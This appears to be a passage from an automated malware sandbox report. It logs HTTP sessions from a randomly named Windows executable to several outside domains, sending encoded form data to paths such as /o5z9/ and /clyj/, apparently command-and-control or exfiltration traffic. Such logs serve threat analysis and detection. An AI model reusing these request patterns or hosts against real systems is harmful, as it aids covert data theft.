                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          35192.168.2.450037154.23.181.780928C:\Program Files (x86)\bJhdQzQITvPPZoAFXXSnRwDidlocuZYKQmISmXrXzcUGaysRqoLveuRscdclDFMo\pQIuyzclQg.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Nov 14, 2024 16:30:18.088232994 CET10775OUTPOST /o5z9/ HTTP/1.1
                                                                                                                                          Host: www.ak711ka10.lat
                                                                                                                                          Accept: */*
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Origin: http://www.ak711ka10.lat
                                                                                                                                          Referer: http://www.ak711ka10.lat/o5z9/
                                                                                                                                          Connection: close
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Content-Length: 10301
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                                                                          Data Raw: 6e 38 43 30 3d 2b 33 64 66 2f 2b 4a 49 6b 79 41 4c 70 68 67 6f 69 46 6f 31 6a 61 68 32 47 33 50 4d 64 2f 50 4a 4d 42 33 30 4b 42 6f 57 44 42 53 36 4a 53 4e 43 7a 73 76 44 47 69 4b 61 2f 2b 50 70 35 67 71 39 76 72 77 79 31 30 44 51 55 51 59 4b 35 33 49 50 56 2f 56 74 56 72 54 63 45 79 57 31 65 46 57 71 69 71 31 33 51 61 63 37 42 41 71 53 2b 61 32 6e 6c 6c 38 39 55 58 77 72 55 52 50 4e 65 79 4b 30 30 4a 2b 4c 56 58 63 64 6d 46 6f 71 45 34 42 59 6b 78 45 41 53 42 7a 5a 53 35 6d 6a 68 43 7a 53 50 74 68 2b 72 67 44 61 56 52 66 4d 6f 68 77 78 47 37 43 56 4c 4a 68 66 77 43 4e 6c 66 59 44 6f 69 41 42 73 46 47 43 30 50 55 44 4f 35 2b 4e 2b 54 4c 53 43 6b 56 65 6b 54 53 70 43 6a 70 74 30 6d 45 4f 31 53 37 30 61 37 41 4c 6d 6f 7a 56 6e 45 76 6a 35 6f 52 4b 36 41 41 4d 46 34 63 76 63 43 49 57 62 59 77 57 62 4d 78 52 43 53 2b 6b 34 6f 48 58 62 6d 45 75 43 59 39 6f 38 64 7a 7a 65 33 48 6e 56 70 44 5a 4d 75 70 61 33 76 75 70 50 56 55 2b 66 37 57 54 4a 59 66 52 56 42 62 44 53 41 4d 41 61 53 30 32 62 75 59 73 4d 32 [TRUNCATED]
                                                                                                                                          Data Ascii: n8C0=+3df/+JIkyALphgoiFo1jah2G3PMd/PJMB30KBoWDBS6JSNCzsvDGiKa/+Pp5gq9vrwy10DQUQYK53IPV/VtVrTcEyW1eFWqiq13Qac7BAqS+a2nll89UXwrURPNeyK00J+LVXcdmFoqE4BYkxEASBzZS5mjhCzSPth+rgDaVRfMohwxG7CVLJhfwCNlfYDoiABsFGC0PUDO5+N+TLSCkVekTSpCjpt0mEO1S70a7ALmozVnEvj5oRK6AAMF4cvcCIWbYwWbMxRCS+k4oHXbmEuCY9o8dzze3HnVpDZMupa3vupPVU+f7WTJYfRVBbDSAMAaS02buYsM2acbuuGgQgjKRZ356Jbrp74pmmtJ8nYlSCc2YzKvrL70A29rwdYK05YeO42mm4sH119MaBLAlp6GpZsIuqgKCLHMGt52agwnQUzkBUo8Pr+K3mi1LVuTVeIKYApIh5fLG1koNa/iW0BiNQnm69fu6lkJgMprbBH5dKUYraw1BjOAgOU5iR0vgdT2Z5LSxh8COogxfRFC/O6cy70G/BkLOV34In8JTJlnX+XqtyvmslTKMobn4w0bOffhyUJmETaSU+tcsECEknZq/dV4ZXVG3HT4Ro+tQ06bn2qKk97CTVBe/7kv9wSYZOeVG5SR+amth7i630xnHqhkUQP7U/9Ev62nl12LyiVNQCwe0RfrcE1tvNjfRfzLAcv/mvME/VhF4+q0OFlru8ChdzVaEqE0xKtFLbbYm7Xup5QRt3Go3SI8X9rAY3Khw0+oOy9B7wRh0UBdZzXypNMXzJinpd/IagvRis8fhvkrHZ2rfskl0tJ/b9gxufxvTewMPr1XzMb8mVPP6FA62hKFyVh/UGxrmW4JywNle5P5ABwbVVsks/Chjecv5g3mG2k0YWnhBKF4X62I7c2mUhXJ5LTvhCzqaWNRHlRyTE6QXAVuenNc5cyGLyekTQcqPWOBrQddz3fJfBCzBXyCVbRw01rf7icDOLj3b1u3jQ8qlQ5 [TRUNCATED]
                                                                                                                                          Nov 14, 2024 16:30:19.029942989 CET691INHTTP/1.1 404 Not Found
                                                                                                                                          Server: nginx
                                                                                                                                          Date: Thu, 14 Nov 2024 15:30:18 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Content-Length: 548
                                                                                                                                          Connection: close
                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          36192.168.2.450038154.23.181.780928C:\Program Files (x86)\bJhdQzQITvPPZoAFXXSnRwDidlocuZYKQmISmXrXzcUGaysRqoLveuRscdclDFMo\pQIuyzclQg.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Nov 14, 2024 16:30:20.996929884 CET412OUTGET /o5z9/?n8C0=z11/8LNw/ilOmRo6t1owndJPGXSfZ5m9S3jiPj8IKRvMXjps+f+3QxK4x8TDiA3fpLYwxgH4NhA45modVvBwcvPKLBygcSenq44QTqtbBz+XibjMqnFeT20=&vva=cTUXfXqHQ4cd-Hh0 HTTP/1.1
                                                                                                                                          Host: www.ak711ka10.lat
                                                                                                                                          Accept: */*
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          Connection: close
                                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                                                                          Nov 14, 2024 16:30:21.982358932 CET691INHTTP/1.1 404 Not Found
                                                                                                                                          Server: nginx
                                                                                                                                          Date: Thu, 14 Nov 2024 15:30:21 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Content-Length: 548
                                                                                                                                          Connection: close
                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          37192.168.2.4500393.33.130.19080928C:\Program Files (x86)\bJhdQzQITvPPZoAFXXSnRwDidlocuZYKQmISmXrXzcUGaysRqoLveuRscdclDFMo\pQIuyzclQg.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Nov 14, 2024 16:30:27.191183090 CET685OUTPOST /clyj/ HTTP/1.1
                                                                                                                                          Host: www.co2cartridges.net
                                                                                                                                          Accept: */*
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Origin: http://www.co2cartridges.net
                                                                                                                                          Referer: http://www.co2cartridges.net/clyj/
                                                                                                                                          Connection: close
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Content-Length: 201
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                                                                          Data Raw: 6e 38 43 30 3d 33 35 6d 72 54 4c 61 4c 5a 51 76 6b 50 56 53 38 6c 6e 78 74 6e 66 4c 6b 48 69 59 52 43 71 4b 58 37 6e 54 4a 2b 70 6d 70 71 48 30 72 36 37 64 4a 52 54 4c 6e 63 33 43 78 7a 64 71 4d 59 41 56 66 4d 39 2b 51 30 33 4d 6b 53 74 76 33 62 78 6d 65 41 47 34 79 41 4e 52 49 41 63 73 74 34 76 71 58 53 65 63 54 72 6f 56 4b 70 57 4d 56 49 62 6a 7a 5a 44 79 53 30 41 52 39 59 72 47 6e 4f 75 6c 5a 53 45 4c 54 50 49 67 6c 58 39 34 53 64 54 2b 6a 45 68 36 75 4f 53 63 63 7a 53 69 68 6b 45 37 6e 6e 48 51 4b 72 54 6e 4e 78 69 46 72 70 43 68 36 61 4f 38 34 53 73 43 66 75 56 67 42 2f 41 4f 62 36 67 3d 3d
                                                                                                                                          Data Ascii: n8C0=35mrTLaLZQvkPVS8lnxtnfLkHiYRCqKX7nTJ+pmpqH0r67dJRTLnc3CxzdqMYAVfM9+Q03MkStv3bxmeAG4yANRIAcst4vqXSecTroVKpWMVIbjzZDyS0AR9YrGnOulZSELTPIglX94SdT+jEh6uOScczSihkE7nnHQKrTnNxiFrpCh6aO84SsCfuVgB/AOb6g==


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          38192.168.2.4500403.33.130.19080928C:\Program Files (x86)\bJhdQzQITvPPZoAFXXSnRwDidlocuZYKQmISmXrXzcUGaysRqoLveuRscdclDFMo\pQIuyzclQg.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Nov 14, 2024 16:30:29.728017092 CET705OUTPOST /clyj/ HTTP/1.1
                                                                                                                                          Host: www.co2cartridges.net
                                                                                                                                          Accept: */*
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Origin: http://www.co2cartridges.net
                                                                                                                                          Referer: http://www.co2cartridges.net/clyj/
                                                                                                                                          Connection: close
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Content-Length: 221
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                                                                          Data Raw: 6e 38 43 30 3d 33 35 6d 72 54 4c 61 4c 5a 51 76 6b 41 56 43 38 6d 41 74 74 32 76 4c 72 5a 79 59 52 62 36 4c 65 37 6e 66 4a 2b 71 71 35 71 30 63 72 2f 70 46 4a 58 69 4c 6e 66 33 43 78 38 4e 71 46 57 67 56 75 4d 39 36 75 30 32 77 6b 53 74 72 33 62 78 32 65 48 33 35 41 47 64 52 47 4e 38 73 56 67 50 71 58 53 65 63 54 72 6f 42 30 70 57 45 56 49 70 33 7a 59 69 79 54 35 67 52 38 50 62 47 6e 4b 75 6c 64 53 45 4c 68 50 4a 4d 44 58 35 49 53 64 53 4f 6a 46 77 36 74 62 43 63 53 39 79 6a 54 6f 33 53 53 6f 58 68 44 70 44 32 69 35 54 35 6e 6c 6b 73 67 4c 2f 64 76 41 73 6d 73 7a 53 70 31 79 44 7a 53 68 6d 4e 67 78 7a 33 5a 41 32 37 70 65 61 47 75 4f 74 41 7a 6f 53 38 3d
                                                                                                                                          Data Ascii: n8C0=35mrTLaLZQvkAVC8mAtt2vLrZyYRb6Le7nfJ+qq5q0cr/pFJXiLnf3Cx8NqFWgVuM96u02wkStr3bx2eH35AGdRGN8sVgPqXSecTroB0pWEVIp3zYiyT5gR8PbGnKuldSELhPJMDX5ISdSOjFw6tbCcS9yjTo3SSoXhDpD2i5T5nlksgL/dvAsmszSp1yDzShmNgxz3ZA27peaGuOtAzoS8=


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          39192.168.2.4500413.33.130.19080928C:\Program Files (x86)\bJhdQzQITvPPZoAFXXSnRwDidlocuZYKQmISmXrXzcUGaysRqoLveuRscdclDFMo\pQIuyzclQg.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Nov 14, 2024 16:30:33.133707047 CET10787OUTPOST /clyj/ HTTP/1.1
                                                                                                                                          Host: www.co2cartridges.net
                                                                                                                                          Accept: */*
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Origin: http://www.co2cartridges.net
                                                                                                                                          Referer: http://www.co2cartridges.net/clyj/
                                                                                                                                          Connection: close
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Content-Length: 10301
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                                                                          Data Raw: 6e 38 43 30 3d 33 35 6d 72 54 4c 61 4c 5a 51 76 6b 41 56 43 38 6d 41 74 74 32 76 4c 72 5a 79 59 52 62 36 4c 65 37 6e 66 4a 2b 71 71 35 71 79 45 72 6a 4d 5a 4a 55 42 7a 6e 65 33 43 78 36 39 71 49 57 67 56 4a 4d 37 53 69 30 32 38 65 53 6f 33 33 61 58 36 65 47 46 52 41 49 64 52 47 45 63 73 75 34 76 72 54 53 65 4d 58 72 6f 52 30 70 57 45 56 49 70 62 7a 66 7a 79 54 71 77 52 39 59 72 47 72 4f 75 6c 6c 53 46 76 78 50 4a 35 2b 57 49 30 53 64 79 65 6a 44 43 43 74 47 79 63 51 77 53 6a 4c 6f 33 4f 37 6f 58 4e 6c 70 41 72 2f 35 54 64 6e 31 44 78 34 53 38 55 73 56 38 33 71 75 69 35 67 37 45 6e 79 67 30 70 41 36 77 71 48 62 6c 72 6b 5a 4c 58 34 63 4f 63 4b 73 53 50 53 67 53 70 70 71 6c 47 63 6d 2b 33 6d 55 7a 44 45 69 79 74 32 68 61 38 4c 58 6d 64 64 6b 2f 61 32 56 6e 42 30 61 6c 6a 6e 6e 70 47 67 78 55 74 73 67 67 34 45 69 4b 62 31 4c 42 77 64 5a 50 2f 4c 2f 67 45 54 36 43 4e 53 6d 33 45 74 65 43 70 34 41 78 57 43 77 58 45 76 58 4b 47 4f 59 47 68 52 6d 6d 53 58 4d 6d 34 2f 4f 74 37 69 4c 6a 2b 7a 59 33 74 35 47 [TRUNCATED]
                                                                                                                                          Data Ascii: n8C0=35mrTLaLZQvkAVC8mAtt2vLrZyYRb6Le7nfJ+qq5qyErjMZJUBzne3Cx69qIWgVJM7Si028eSo33aX6eGFRAIdRGEcsu4vrTSeMXroR0pWEVIpbzfzyTqwR9YrGrOullSFvxPJ5+WI0SdyejDCCtGycQwSjLo3O7oXNlpAr/5Tdn1Dx4S8UsV83qui5g7Enyg0pA6wqHblrkZLX4cOcKsSPSgSppqlGcm+3mUzDEiyt2ha8LXmddk/a2VnB0aljnnpGgxUtsgg4EiKb1LBwdZP/L/gET6CNSm3EteCp4AxWCwXEvXKGOYGhRmmSXMm4/Ot7iLj+zY3t5GFqDNFLcFTSeqwsEGnvg7+wzcarCBdXc+NvIdeviLVxKvG8ySGYdOy/LSnknB766RUQ3KnI+bzTuUGOB4MTXwS2mrdIdt1jEExyRXDYxyq0/Ihf9QzDelhQ1inqlWMjXLoyGmIlmZXLusqjVJzmdqTBXe+TSaBU/86J0fV7hGtYO2uA+48rnnJ3nRSewMSZfxBuF41OcJm8/i3r1d+5etwUynA/Qt2CDVziYtMzXiriUHbNKHVwvF42zalRRJgVz9OeooZwRG+APaHr/pdrUPEJ2uzsU6giE1m1Q2RzcuJ5+RGicyTvTYOaSOm6x5q8g4oFpn0e5ehqtgkfl/N8D03ujcC1Q4sgRd+uPePNZbLe58i9RYGDyv6ahvGjb623d8HTGcbAOs2EHiXD0ws7xnU58lg+AjTZMMLKQ/pcO6C7FgTCUEL5ugIlv+5YJhbWVxY4+1yI3rWQ136aSg/5YxV0YduaatBLla/Iay4wMnxg7jRO3knSExx+kG9TuQuHKVW+yhk8E52W4LxW8waROidL/rBZgfb1ajwaH7lO+UNBiR903P7VD40YvpSZRN8WkyKjhRI8o4d0hC9dCVIh2iwgglxq9GuxJngrQ6SYHjFk7rH19HrLDZPdjMlAG3u3+GBqcNAcYkEQh95aF3/RlTpCKhGdB4uY8qqC [TRUNCATED]


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          40192.168.2.4500423.33.130.19080928C:\Program Files (x86)\bJhdQzQITvPPZoAFXXSnRwDidlocuZYKQmISmXrXzcUGaysRqoLveuRscdclDFMo\pQIuyzclQg.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Nov 14, 2024 16:30:35.681257963 CET416OUTGET /clyj/?vva=cTUXfXqHQ4cd-Hh0&n8C0=67OLQ/itOzy1KnXwmhg86ePiFTdHKMCP1Q+a3Yqjn3tA475bPQfRHEiawc6HFAwne4/7/Qcre8rqVQWkFmsoAaxQL8wqiLfDevouvJkPhUImbqP6UxWa6D8= HTTP/1.1
                                                                                                                                          Host: www.co2cartridges.net
                                                                                                                                          Accept: */*
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          Connection: close
                                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                                                                          Nov 14, 2024 16:30:36.305202961 CET401INHTTP/1.1 200 OK
                                                                                                                                          Server: openresty
                                                                                                                                          Date: Thu, 14 Nov 2024 15:30:36 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Content-Length: 261
                                                                                                                                          Connection: close
                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 76 76 61 3d 63 54 55 58 66 58 71 48 51 34 63 64 2d 48 68 30 26 6e 38 43 30 3d 36 37 4f 4c 51 2f 69 74 4f 7a 79 31 4b 6e 58 77 6d 68 67 38 36 65 50 69 46 54 64 48 4b 4d 43 50 31 51 2b 61 33 59 71 6a 6e 33 74 41 34 37 35 62 50 51 66 52 48 45 69 61 77 63 36 48 46 41 77 6e 65 34 2f 37 2f 51 63 72 65 38 72 71 56 51 57 6b 46 6d 73 6f 41 61 78 51 4c 38 77 71 69 4c 66 44 65 76 6f 75 76 4a 6b 50 68 55 49 6d 62 71 50 36 55 78 57 61 36 44 38 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                          Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?vva=cTUXfXqHQ4cd-Hh0&n8C0=67OLQ/itOzy1KnXwmhg86ePiFTdHKMCP1Q+a3Yqjn3tA475bPQfRHEiawc6HFAwne4/7/Qcre8rqVQWkFmsoAaxQL8wqiLfDevouvJkPhUImbqP6UxWa6D8="}</script></head></html>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          41192.168.2.450043195.110.124.13380928C:\Program Files (x86)\bJhdQzQITvPPZoAFXXSnRwDidlocuZYKQmISmXrXzcUGaysRqoLveuRscdclDFMo\pQIuyzclQg.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Nov 14, 2024 16:30:41.438518047 CET688OUTPOST /2vhi/ HTTP/1.1
                                                                                                                                          Host: www.nutrigenfit.online
                                                                                                                                          Accept: */*
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Origin: http://www.nutrigenfit.online
                                                                                                                                          Referer: http://www.nutrigenfit.online/2vhi/
                                                                                                                                          Connection: close
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Content-Length: 201
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                                                                          Data Raw: 6e 38 43 30 3d 6b 30 75 34 79 6a 2b 30 6c 4f 69 72 35 50 4f 55 59 4c 51 58 77 35 53 62 77 79 4a 2f 44 32 61 73 47 35 5a 38 35 54 2f 7a 66 47 6c 42 4c 72 6b 76 64 41 57 6a 51 4c 33 42 74 6d 62 39 42 4d 71 50 74 65 35 52 6d 6b 67 68 36 2b 79 4f 52 59 2f 4c 6f 5a 46 72 38 31 58 48 33 68 65 55 6b 70 4c 4b 36 55 39 66 76 70 6e 4e 31 53 47 6a 47 6b 6f 63 64 56 43 51 78 6d 46 31 4a 46 53 4d 58 6b 38 52 41 49 66 39 54 38 50 6d 49 35 4d 30 41 31 63 64 55 4c 64 47 70 44 4f 6e 36 43 49 6f 74 50 55 6d 6d 38 55 44 6f 6c 5a 42 34 44 67 4e 71 45 35 4b 2f 70 34 36 50 57 52 2f 74 72 68 33 6f 71 63 4b 44 77 3d 3d
                                                                                                                                          Data Ascii: n8C0=k0u4yj+0lOir5POUYLQXw5SbwyJ/D2asG5Z85T/zfGlBLrkvdAWjQL3Btmb9BMqPte5Rmkgh6+yORY/LoZFr81XH3heUkpLK6U9fvpnN1SGjGkocdVCQxmF1JFSMXk8RAIf9T8PmI5M0A1cdULdGpDOn6CIotPUmm8UDolZB4DgNqE5K/p46PWR/trh3oqcKDw==
                                                                                                                                          Nov 14, 2024 16:30:42.290924072 CET367INHTTP/1.1 404 Not Found
                                                                                                                                          Date: Thu, 14 Nov 2024 15:30:42 GMT
                                                                                                                                          Server: Apache
                                                                                                                                          Content-Length: 203
                                                                                                                                          Connection: close
                                                                                                                                          Content-Type: text/html; charset=iso-8859-1
                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 32 76 68 69 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /2vhi/ was not found on this server.</p></body></html>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          42192.168.2.450044195.110.124.13380928C:\Program Files (x86)\bJhdQzQITvPPZoAFXXSnRwDidlocuZYKQmISmXrXzcUGaysRqoLveuRscdclDFMo\pQIuyzclQg.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Nov 14, 2024 16:30:43.979094982 CET708OUTPOST /2vhi/ HTTP/1.1
                                                                                                                                          Host: www.nutrigenfit.online
                                                                                                                                          Accept: */*
